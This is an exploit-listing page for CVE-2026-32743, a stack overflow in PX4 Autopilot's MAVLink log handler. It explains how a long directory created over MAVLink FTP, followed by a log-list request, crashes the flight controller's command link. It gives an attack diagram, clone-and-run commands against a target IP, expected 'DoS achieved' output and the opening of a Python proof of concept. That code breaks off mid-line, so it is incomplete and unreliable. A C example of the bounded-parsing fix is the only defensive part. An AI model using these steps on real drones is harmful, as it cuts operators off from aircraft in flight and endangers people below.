## https://sploitus.com/exploit?id=995BBC30-CEE5-5D4C-AAAC-4B6A991BB7CF
# CVE-2026-32743 - PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS)
[CVE-2026-32743](https://vulners.com/cve/CVE-2026-32743) · [CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) · [CWE-121](https://cwe.mitre.org/data/definitions/121.html)
---
## Description
**CVE-2026-32743** is a **stack-based buffer overflow** in the `MavlinkLogHandler` of PX4 Autopilot versions **≤1.17.0-rc2**.
The `LogEntry.filepath` buffer is only **60 bytes**, but `sscanf()` parses log directory paths **without a width specifier**.
An attacker with **MAVLink link access** can:
1. Use **MAVLink FTP** to create a deeply nested directory (path length > 60 bytes) inside `/fs/microsd/log/`.
2. Request the log list via `MAV_CMD_REQUEST_LOG_LIST`.
3. The vulnerable `MavlinkLogHandler` copies the long path into the 60-byte buffer → **stack overflow**.
4. The MAVLink task crashes → **loss of telemetry and command capability** → **persistent Denial of Service** (until reboot).
**Fixed in**: [commit 616b25a](https://github.com/PX4/PX4-Autopilot/commit/616b25a280e229c24d5cf12a03dbf248df89c474) (added width specifier to `sscanf`).
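
The fix described above, as an added example that is not PX4's code: a bounded `sscanf` that also rejects over-long paths instead of silently truncating them. `struct log_entry`, `parse_log_line` and the `time size path` line layout are assumptions for illustration; only the 60-byte buffer and the missing width come from this page.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FILEPATH_MAX 60                 /* buffer size stated on this page */
struct log_entry {                      /* simplified stand-in, not PX4's struct */
    unsigned time_utc, size_bytes;
    char filepath[FILEPATH_MAX];
};
/* The "%59s" literal below has to change whenever the buffer size does. */
_Static_assert(FILEPATH_MAX == 60, "keep the sscanf width in step with filepath");

/* Unbounded pattern described above (comment only, never compiled):
 *     sscanf(line, "%u %u %s", &e->time_utc, &e->size_bytes, e->filepath);
 * "%s" copies until whitespace, so a 70-byte path writes past filepath[59]. */

/* Returns 0 on success, -1 on malformed input, -2 if the path does not fit. */
int parse_log_line(const char *line, struct log_entry *e)
{
    int consumed = 0;
    memset(e, 0, sizeof *e);
    /* "%59s" stores at most 59 bytes plus the NUL, i.e. FILEPATH_MAX bytes. */
    int n = sscanf(line, "%u %u %59s%n",
                   &e->time_utc, &e->size_bytes, e->filepath, &consumed);
    if (n != 3)
        return -1;
    /* A width only truncates. If non-space input follows the token, the path
     * was longer than the buffer: reject it rather than act on a silently
     * shortened (and therefore wrong) name. */
    if (line[consumed] != '\0' && !isspace((unsigned char)line[consumed])) {
        e->filepath[0] = '\0';
        return -2;
    }
    return 0;
}

int main(void)
{
    struct log_entry e;
    char bad[128] = "1 2 /fs/microsd/log/";    /* constructed sample input */
    memset(bad + strlen(bad), 'A', 70);        /* 70-byte directory name */
    printf("normal: %d\n", parse_log_line("1 2 /fs/microsd/log/sess001", &e));
    printf("long:   %d\n", parse_log_line(bad, &e));
    return 0;
}
```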
---
## 🔥 Attack Flow Diagram
```mermaid
sequenceDiagram
participant Attacker
participant PX4 as PX4 Flight Controller
participant SD as SD Card (/fs/microsd/log/)
Attacker->>PX4: 1. Open MAVLink connection (UDP 14550)
PX4-->>Attacker: Heartbeat (system/component IDs)
Note over Attacker,PX4: Step 2: Create long directory via MAVLink FTP
Attacker->>PX4: MAVLink FTP: OpenFile( path = "/fs/microsd/log/" + "A"*70, flags=O_CREAT|O_DIRECTORY )
PX4->>SD: Create directory (named 70×'A')
SD-->>PX4: OK
Note over Attacker,PX4: Step 3: Trigger overflow by requesting log list
Attacker->>PX4: MAV_CMD_REQUEST_LOG_LIST (command 261)
PX4->>PX4: MavlinkLogHandler::list() reads log directory
PX4->>PX4: sscanf(path, "%s", LogEntry.filepath) ← NO width limit!
Note right of PX4: Buffer overflow: 70 bytes written into 60-byte buffer
PX4--xAttacker: MAVLink task crashes → no more heartbeats/commands
Note over Attacker,PX4: ✅ DoS achieved → flight controller unmanageable
```
---
## ⚙️ Prerequisites
- **Target running PX4** ≤ `1.17.0-rc2` with **SD card** mounted (logs stored in `/fs/microsd/log/`).
- **MAVLink FTP enabled** (default on most PX4 builds).
- **Network access** to the flight controller's MAVLink UDP port (default `14550`).
- **Python 3.6+** with `pymavlink` installed:
```bash
pip install pymavlink
```
---
## Usage
```bash
git clone https://github.com/mbanyamer/CVE-2026-32743-PoC
cd CVE-2026-32743-PoC
python3 exploit.py <target_ip> [--port <port>]
```
| Argument | Description | Default |
|--------------|--------------------------------------|-----------|
| `target_ip` | IP address of the flight controller | *required*|
| `--port` | MAVLink UDP port | `14550` |
### Example
```bash
python3 exploit.py 192.168.1.10 --port 14550
```
**Expected output** (successful DoS):
```
[*] Connecting to MAVLink target: 192.168.1.10:14550
[+] Heartbeat received from system 1, component 1
[*] Creating long directory: /fs/microsd/log/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (length 80 bytes)
[+] Directory created (or already existed).
[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...
[*] Waiting for crash (target will stop responding)...
[+] Target unresponsive - DoS achieved!
```
---
## PoC Code
```python
#!/usr/bin/env python3
# Exploit Title: PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS)
# CVE: CVE-2026-32743
# Date: 2026-05-08
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://px4.io/
# Software Link: https://github.com/PX4/PX4-Autopilot
# Affected: Versions 1.17.0-rc2 and below
# Tested on: PX4 v1.17.0-rc2 (Pixhawk)
# Category: DoS
# Platform: Embedded (PX4 Autopilot)
# Exploit Type: Stack-based Buffer Overflow
# CVSS: 7.5 (High)
# CWE: CWE-121
# Description: Creates an overly long directory via MAVLink FTP, then requests log list.
# Fixed in: https://github.com/PX4/PX4-Autopilot/commit/616b25a
# Usage: python3 exploit.py <target_ip> [--port <port>]
import time
import struct
import argparse
from pymavlink import mavutil
from pymavlink.dialects.v20 import common as mavlink2
def send_ftp_command(mav, seq, payload):
    msg = mav.file_transfer_protocol_encode(
        target_system=mav.target_system,
        target_component=mav.target_component,
        payload=payload
    )
    mav.mav.send(msg)


def ftp_create_directory(mav, path):
    O_CREAT = 0x04
    O_DIRECTORY = 0x08
    seq = 1
    path_bytes = path.encode('utf-8') + b'\x00'
    payload = struct.pack('
    # (the listing is cut off at this point on the page)
```
> *"Silent Hunter | Shadow Presence | Digital Intel"*
---
## ⚠️ Disclaimer
This proof of concept (PoC) is intended **solely for educational and defensive purposes**.
Unauthorized use against systems you do not own or have explicit permission to test is **illegal**.
The author assumes **no liability** for any misuse or damage caused by this software.
---
## License
This project is licensed under the **MIT License** - see the [LICENSE](LICENSE) file for details.
Feel free to use, modify, and distribute with attribution.